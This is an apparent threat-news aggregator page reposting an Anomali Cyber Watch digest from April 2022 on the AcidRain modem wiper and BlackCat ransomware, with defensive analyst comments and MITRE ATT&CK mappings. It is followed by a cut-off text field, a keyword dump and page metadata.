SOC News: Article

One Article Review

Accueil - L'article:

Source	Anomali
Identifiant	4400992
Date de publication	2022-04-05 18:17:00 (vue: 2022-04-05 19:06:05)
Titre	Anomali Cyber Watch: AcidRain Wiped Viasat Modems, BlackMatter Rewritten into BlackCat Ransomware, SaintBear Goes with Go, and More
Texte	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Information stealers, Phishing, Russia, Ukraine, Vulnerabilities, and Wipers. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence AcidRain \| A Modem Wiper Rains Down on Europe (published: March 31, 2022) On February 24, 2022, Viasat KA-SAT modems became inoperable in Ukraine after threat actors exploited a misconfigured VPN appliance, compromised KA-SAT network, and were able to execute management commands on a large number of residential modems simultaneously. SentinelOne researchers discovered that a specific Linux wiper, dubbed AcidRain, likely used in that attack as it shows the same targeting and the same overwriting method that was seen in a Viasat’s Surfbeam2 modem targeted in the attack. AcidRain shows code similarities with VPNFilter stage 3 wiping plugin called dstr, but AcidRain’s code appears to be sloppier, so the connection between the two is still under investigation. Analyst Comment: Internet service providers are heavily targeted due to their trust relationships with their customers and they should harden their configurations and access policies. Devices targeted by AcidRain can be brought back to service through flash memory/factory reset. Organizations exposed to Russia-Ukrainian military conflict should plan for backup options in case of a wiper attack. MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 \| [MITRE ATT&CK] System Shutdown/Reboot - T1529 \| [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] Supply Chain Compromise - T1195 Tags: AcidRain, Viasat KA-SAT, Russia, Ukraine, Germany, target-country:UA, target-country:DE, Wiper, Modem, Supply-chain compromise, VPN appliance, VPNFilter BlackCat Ransomware (published: March 31, 2022) BlackCat (ALPHV) ransomware-as-a-service surfaced on Russian-speaking underground forums in late 2021. The BlackCat ransomware is perhaps the first ransomware written entirely in Rust, and is capable of targeting both Windows and Linux machines. It targeted multiple industries in the US, Europe, the Philippines, and other regions, and Polyswarm researchers expect it to expand its operations. It is attributed to the BlackMatter/DarkSide ransomware threat group. BlackCat used some known BlackMatter infrastructure and shared the same techniques: reverse SSH tunnels and scheduled tasks for persistence, LSASS for credential access, lmpacket, RDP, and psexec for command and control. Analyst Comment: It is crucial for your company to ensure that servers are always running the most current software version. Your company should have policies in place in regards to the proper configurations needed for your servers in order to conduct your business needs safely. Additionally, always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe). Furthermore, a business continuity plan should be in place in the case of a
Envoyé	Oui
Condensat	$160 0056 2014 2015 2021 2022 40444 able about abusing access account accounts acidrain acidrain’s activation active activity actor actors addition additional additionally address ads advanced advertising affairs after agencies algorithm align all alphv always analyst analyzed anomali anonymous another anti any api appears appliance application applications apps apt archived are arguments att&ck att&ck: attached attaching attachment attachments attack attacker attackers attacking attacks attempts attributed august authentication authenticity authorities autoit awareness babadeda back backdoored backdoors backup banking banks based basic beacon bear became because been being below: between binance binary blackcat blackmatter blackmatter/darkside bleeding bokbot both broker brought builds bureau business but bypass cab cabin cabless call called campaign campaigns can canada capable carbanak carbanak/darkside carbon carries case caused caution censorship chain channels charts chatting check checks cloudflare cobalt cobaltstrike code coded coinbase collection colonial comes coming command commands comment: commonly communications companies company compromise compromised conduct conducts configurations confirm conflict connection constant contained continuity continuous continuously control controls conversation conversations convincing country:ca country:de country:ph country:ru country:ua country:us craft credential credentials crisis critical crucial crypter cryptocurrency cryptominer current customer customers cve cyber cyberattack darkside data debugged decodes defenders defense defensive deliver delivering deobfuscate/decode depth destruction detected determine development devices dga different directories directory discord discovered discovery discuss discussed dll dlls document documents doesn’t domain domains don’t down download downloaded downloader downloads dozen drop dstr dubbed due dumping dynamic education either election elections email emails embedded embedding employed enable encoded encourage encrypted endpoint energy engine engineering ensure entirely environment especially establish europe evasion every exchange exe execute executed executes execution expand expanded expect expects exploit exploited exploits exposed facing factor failsafe fbi february federal federation figure file file; files finance first flash focused following forge formats forums found free from furthermore generation germany get gitlab glimpse go: goes golang gold google government governments graphsteel grimplant group gziploader had hard harden harvest harvesting has hashing have healthcare heavily helping hex higher hijacked hijacking himself hospitality host html hygiene icedid impacket impact implement important improve improving include: included increased industries industry infection information infostealer infrastructure ingress initial initially inoperable insider install instructed intelligence internal internet interpreter intezer investigation invoice ioc iocs iso iteration its itself january jar java jscript june just keep keylogged known large late latest law layered lead leads least legitimate less level like likely line linux lmpacket lnk loader logs look looks lorec53 low lsass lure mac machine machines macros macroses made magazine major making malicious malware malwarebytes management manufacturers many march mark mars masquerading math may measures mechanisms memory/factory messaged messages messenger metamask method mfa microsoft midterm military miner ministry misconfigured mitigations mitre modem modems monitor more morphisec most motw mshtml multi multiple needed needs network networks new news next nine not november number obfuscated objective observed october officials often online only open operation operations operator options order organizations oski other over overwriting own owner/user packed password patch payloads pdf perhaps persistence pharmaceutical philippines phishing phone pipeline pirated place plan plugin plugins point policies polymorphic polyswarm pos possible pos
Tags	Ransomware Malware Tool Vulnerability Threat Guideline
Stories	VPNFilter VPNFilter
Notes
Move

L'article ne semble pas avoir été repris aprés sa publication.

L'article ne semble pas avoir été repris sur un précédent.